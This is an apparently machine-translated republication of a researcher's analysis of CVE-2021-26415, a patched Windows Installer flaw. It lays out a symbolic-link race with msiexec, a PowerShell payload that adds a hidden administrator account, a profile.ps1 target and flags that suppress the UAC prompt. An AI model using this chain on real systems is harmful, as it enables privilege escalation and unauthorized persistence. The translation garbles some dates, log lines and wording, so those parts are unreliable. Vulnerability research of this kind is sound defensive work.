Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to carry out CVE-2021-26415 analysis of Windows Installer arbitrary file writing loopholes. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

CVE IDCVE-2021-26415CVSS score 7.3, (AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) affected vendor Microsoft affected product Windows vulnerability details this vulnerability allows a local attacker to write data to any file on the affected Microsoft Windows installation. An attacker must first gain the ability to execute low-privileged code on the target system to exploit this vulnerability. There are specific flaws in the Windows Installer service. The reason for this problem is that the user-supplied path is not properly validated before it is used in the file operation. An attacker can exploit this vulnerability to escalate privileges and execute arbitrary code in the context of the administrator. Additional details Microsoft has released an update to correct this vulnerability. More details can be found at msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26415 Disclosure schedule 2020-12-16-vulnerabilities reported to vendors

2021-04-15-coordinate public consultation

* the relevant vulnerabilities involved in this article have been reported to the manufacturer and repaired. This article is limited to technical research and discussion, and illegal use is strictly prohibited, otherwise all consequences will be borne by ourselves.

This is a local privilege escalation (LPE) vulnerability that affects Windows Installer components. It is based on TOCTOU and file system attacks using symbolic links. This problem results in writing to arbitrary files with LocalSystem privileges and partial control over the content. I can't find a vector that has complete control over the content (to replace the contents of the DLL file, etc.), but even partial control is enough to inject arbitrary PowerShell commands into the default configuration file and run the PowerShell console in an administrator account or at a scheduled time to elevate privileged tasks.

I reported the problem with Windows 10 and 2019 Server as 0day, but according to the notification, the issue also affected other systems: 8.1,7, 2012, 2016, 2008. Ancient systems may also be vulnerable.

Technical details Windows installer

The msiexec system binaries are used to install applications from the MSI format (Windows installation package). It is not only a nickname for PE files, but also has a slightly more complex format. The typical use of msiexec requires administrative privileges, but there are exceptions. For example, the / f switch can be used by a non-privileged user to perform a repair operation. This operation can usually be performed without any administrator privileges. In the past, this switch has been used in a variety of LPE attacks-the vulnerable component is usually the MSI package itself. Typically, to find this type of MSI, I just need to go to the C:\ Windows\ Installer directory and start there. This time, we will select only one existing file and use it to attack the operating system itself. The second-hand installer (148d3c4.msi) is some random DropBox MSI I found on the system.

If / L provides an option, you can extend the repair operation by recording. The msiexec records some information to a cutting-edge file. Let's use procmon to see what happens when a normal user executes the following command:

Msiexec / f C:\ Windows\ Installer\ 148d3c4.msi / L C:\ temp\ foo.log

In the figure above, you can see the configured filters and highlights. This helps to visually distinguish between operations that run at the system integrity level but simulate ordinary users and users who use full functionality. For example, use simulation for an initial CreateFile operation that points to a file. This process does not open anything that we cannot access. We cannot just point to other files (such as C:\ Windows\ win.ini) and rely on elevated access. It won't work, and from LPE's point of view, it's not interesting.

In the following lines, use the full LocalSystem token to process the file again, but this time. Maybe only the initial access to the file is protected? We can use symbolic links to test.

Symbolic link attack

I won't cover symbolic links in detail, and if you're not familiar with this concept, check out an excellent introduction to the abuse of Windows privileged file operations.

The symbolic link toolkit in James Forshaw is a de facto standard for the use of and other issues. In particular, the BaitAndSwitch.exe application does everything needed here-capturing the initial file check in oplock, and then changing the link from the original file to a different location-the target file. The initial permission check verifies access to the secure file, but then reads / writes to another file (now pointed to by the same symbolic link). This is a typical TOCTOU problem. The kind of symbolic link used in this case does not require any special access-any unprivileged user can create one.

Let's execute the following command:

BaitAndSwitch.exe C:\ temp\ linkdir\ link C:\ temp\ foo.log C:\ foo.logmsiexec / f C:\ Windows\ Installer\ 148d3c4.msi / L C:\ temp\ linkdir\ link

This is the initial file access, and the bill of materials (BOM) character is written from a medium integrity thread-it also validates access to the file. Once confirmed, the BaitAndSwitch will be triggered and the location pointed to will be changed.

Do you see? The symbolic link has been switched to the new target (C:\ foo.log), and after a bunch of operations under the simulation, a CreateFile is created from LocalSystem. After a few more operations, the file will be closed and eventually saved on disk.

This file follows existing access rules-no additional permissions are provided, but we only prove arbitrary writes. What's in it?

MSI (s) (AC:34) [16-14-Configuration completed successfully.MSI (s) (AC:34) [16-14-11-Configuration completed successfully.MSI (s)]: Windows Installer reconfigured the product. Product Name: Dropbox Update Helper. Product Version: 1.3.415.1. Product Language: 1033. Manufacturer: Dropbox, Inc.. Reconfiguration success or error status: 0.

Well, it's useless. We may overwrite important files, but we will not directly elevate privileges. We will have to work hard for this.

Partial content control

At this point, I start to check the returned flag msiexec / h. May it be possible to gain full or at least partial control over the written data?

There are some good candidates in the logging option parameters:

/ fp adds terminal attributes, some of which are absolutely under my control because they come from user-writable registry hives or environment variables. For example, see how to inject; notepad.exe; to the% APPDATA% variable.

= = Logging started: 4DropboxProgramDir 15and2021 20:18:09 = = Property (S): UpdateDir = C:\ ProgramFiles (x86)\ Dropbox\ Update\ Property (S): DropboxProgramDir = C:\ ProgramFiles (x86)\ Dropbox\ Property (S): ProgramFilesFolder = C:\ ProgramFiles (x86)\ Property (S): TARGETDIR = C:\ Property (S): ALLUSERS = 1Property (S): ARPSYSTEMCOMPONENT = 1Property (S): DISABLEROLLBACK = 1Property (S): Manufacturer = Dropbox Inc.Property (S): ProductCode = {099218A5-A723-43DC-8DB5-6173656A1E94} Property (S): ProductLanguage = 1033Property (S): ProductName = Dropbox Update HelperProperty (S): ProductVersion = 1.3.415.1Property (S): UpgradeCode = {C7A2CC6E-044B-4A2C-BD1E-E75EAD2C11B0} Property (S): MsiLogFileLocation = C:\ temp\ log.txtProperty (S): PackageCode = {E42CA6BD-944C-4847-A481-D150906EC78E} Property (S): ProductState = 5Property (S): ProductToBeRegistered = 1Property (S): RestrictedUserControl = 1Property (S): REINSTALL = ALLProperty (S): REINSTALLMODE = pecmsProperty (S): CURRENTDIRECTORY = C:\ Users\ lowprivProperty (S): CLIENTUILEVEL = 2Property (S): CLIENTPROCESSID = 12412Property (S): MsiSystemRebootPending = 1Property (S): PRODUCTLANGUAGE = 1033Property (S): VersionDatabase = 300Property (S): VersionMsi = 5.00Property (S): VersionNT = 603Property (S): VersionNT64 = 603Property (S): WindowsBuild = 9600Property (S): ServicePackLevel = 0Property (S): ServicePackLevelMinor = 0Property (S): MsiNTProductType = 1Property (S): WindowsFolder = C :\ WINDOWS\ Property (S): WindowsVolume = C:\ Property (S): System64Folder = C:\ WINDOWS\ system32\ Property (S): SystemFolder = C:\ WINDOWS\ SysWOW64\ Property (S): RemoteAdminTS = 1Property (S): TempFolder = C:\ Users\ lowpriv\ AppData\ Local\ Temp\ Property (S): CommonFilesFolder = C:\ ProgramFiles (x86)\ CommonFiles\ Property (S): ProgramFiles64Folder = C:\ ProgramFiles\ Property (S): CommonFiles64Folder = C:\ ProgramFiles\ CommonFiles\ Property (S) ): AppDataFolder = C:\ Users\ lowpriv\ AppData\ Roaming Notepad.exe \ Property (S): FavoritesFolder = C:\ Users\ lowpriv\ Favorites\ Property (S): NetHoodFolder = C:\ Users\ lowpriv\ AppData\ Roaming\ Microsoft\ Windows\ Network Shortcuts\ Property (S): PersonalFolder = C:\ Users\ lowpriv\ Documents\ Property (S): PrintHoodFolder = C:\ Users\ lowpriv\ AppData\ Roaming\ Microsoft\ Windows\ Printer Shortcuts\ Property (S): RecentFolder = C:\ Users\ lowpriv\ AppData\ Roaming\ Microsoft\ Windows\ Windows (S): Recent = C:\ Recent\ Property \ AppData\ Roaming\ Microsoft\ Windows\ SendTo\ Property (S): TemplateFolder = C:\ ProgramData\ Microsoft\ Windows\ Templates\ Property (S): CommonAppDataFolder = C:\ ProgramData\ Property (S): LocalAppDataFolder = C:\ Users\ lowpriv\ AppData\ Local\ Property (S): MyPicturesFolder = C:\ Users\ lowpriv\ Pictures\ Property (S): AdminToolsFolder = C:\ ProgramData\ Microsoft\ Windows\ Start Menu\ Programs\ Administrative Tools\ Property (S): StartupFolder = C:\ ProgramData\ ProgramData\ Microsoft\ Microsoft\ Property Startup\ Property (S): ProgramMenuFolder = C:\ ProgramData\ Microsoft\ Windows\ StartMenu\ Programs\ Property (S): StartMenuFolder = C:\ ProgramData\ Microsoft\ Windows\ StartMenu\ Property (S): DesktopFolder = C:\ Users\ Public\ Desktop\ Property (S): FontsFolder = C:\ WINDOWS\ Fonts\ Property (S): GPTSupport = 1Property (S): OLEAdvtSupport = 1Property (S): ShellAdvtSupport = 1Property (S): MsiAMD64 = 6Property (S): Msix64 = 6Property (S): Intel = 6Property (S): 6Property = 5687Property (S): VirtualMemory = 2713Property (S): LogonUser = lowprivProperty (S): UserSID = Smur1-5-21-2746136434-3241333796-1554539884-1002Property (S): UserLanguageID = 1033Property (S): ComputerName = DESKTOP-OMNIO40Property (S): SystemLanguageID = 1033Property (S): ScreenX = 1024Property (S): ScreenY = 768Property (S): CaptionHeight = 19Property (S): BorderTop = 1Property (S): BorderSide = 1Property (S): TextHeight = 16Property (S): TextInternalLeading = 3Property (S): ColorBits = 32Property (S): TTCSupport = 1Property (S): Time = 20:18:09Property (S): Date = 4/15/2021Property (S): MsiNetAssemblySupport = 4.8.4084.0Property (S): MsiWin32AssemblySupport = 6.3.19041.1Property (S): RedirectedDllSupport = 2Property (S): AdminUser = 1Property (S): MsiRunningElevated = 1Property (S): Privileged = 1Property (S): USERNAME = AdrianProperty (S): Installed = 00:00:00Property (S): DATABASE = C:\ WINDOWS\ Installer\ 148d3c4.msiProperty (S): OriginalDatabase = C :\ WINDOWS\ Installer\ 148d3c4.msiProperty (S): RollbackDisabled = 1Property (S): UILevel = 3Property (S): Preselected = 1Property (S): ACTION = INSTALLProperty (S): ROOTDRIVE = C:\ Property (S): CostingComplete = 1Property (S): OutOfDiskSpace = 0Property (S): OutOfNoRbDiskSpace = 0Property (S): PrimaryVolumeSpaceAvailable = 0Property (S): PrimaryVolumeSpaceRequired = 0Property (S): PrimaryVolumeSpaceRemaining = 0Property (S): INSTALLLEVEL = 1 seam = Logging stopped: 4That 152021 20:18:09 = =

If you don't understand why this might be useful, I'll explain it in the second second. Now, there is a lot of rubbish in the output. Let's try harder.

/ L +

Will be appended rather than overwritten-this can be useful in some cases and enables us to test attacks without destroying the entire file.

/ Lc

Only the initial UI parameters are recorded. This results in only two lines of output, but not under the control of the attacker.

= Logging started: 4 cusp 15max 2021 20:28:50 = Logging stopped: 4Accord 15max 2021 20:28:50 =

Other logging flags don't help much, and they even cause MSI to use multiple threads and may cause other problems. Some will record lengthy messages, others will only record errors. Maybe malicious MSI packages have more control over the content? Sounds like a good idea. Let's prepare a custom one.

Make MSI

You can use the WiX toolset to make custom MSI packages. In this way, we will control the behavior and other properties of the MSI package.

First, we need to create an example.wxs file with the following:

Note the name attribute. It contains injected PowerShell commands and separate instructions for ";". The "#" at the end is used to comment out the rest of the characters in the line. It will be clearer later.

Now we can use candle.exe example.wxs to process the above definition and light example.wixobj to create the example.msi package.

Let's move it to the attacked system and redo the attack:

Msiexec / f C:\ temp\ example.msi / L C:\ Temp\ log.txt

Oops. This won't work-we need to install the package first, which obviously requires administrator privileges. Let's not even start with social engineering narrative. This is a dead end.

Product advertising

I decided to test the other flags-maybe fixing is not the only interesting option for triggering. The / j option is used to promote the product-m to all users and u to the current user. Let's see what it really does:

BaitAndSwitch C:\ temp\ linkdir\ link C:\ temp\ fakelog.txt C:\ foo.logmsiexec / j example.msi / L C:\ temp\ linkdir\ link

UAC hint. So, after all, it has to be just admin... However, if we look at procmon-, it looks like a write has taken place.

We don't need to provide any credentials at all! At this point, we can safely cancel UAC- viaduct writing has happened! Data controlled by the attacker will be attached to the target file, and we can perform arbitrary writes with partial content control.

The final touch-up

The C:\ foo.log file now contains:

MSI (s) (58:68) [21 add 20]: Product:; net user FooBar P@ssw0rd / add; net localgroup Administrators FooBar / add #-- Advertisement failed.

Did I mention that this is an UTF-16 file? All right, all right. So it cannot be converted to an cmd.exe payload, but PowerShell will be happy to process the file. Semicolons are used to split commands and comment out the rest of the text using hash characters.

If you overwrite (or create a new) C:\ Windows\ System32\ WindowsPowerShell\ v1.0\ profile.ps1, the operation will start the next time the administrator starts PowerShell. Other LPE locations are also appropriate, but considering that other vectors will be your homework.

Another problem I want to solve is to get rid of the UAC hint completely. To do this, another switch is used: / t somevalue / qn-, which triggers a silent error after writing but before the UAC prompt. We deliberately want the installer to fail at an early stage. The / qn switch will guarantee no UI. Even without GUI access to the system, the payload can be made available, and nothing prevents the console from interacting.

The above is the editor for you to share how to carry out Windows Installer arbitrary file writing loophole CVE-2021-26415 analysis, if there happen to be similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.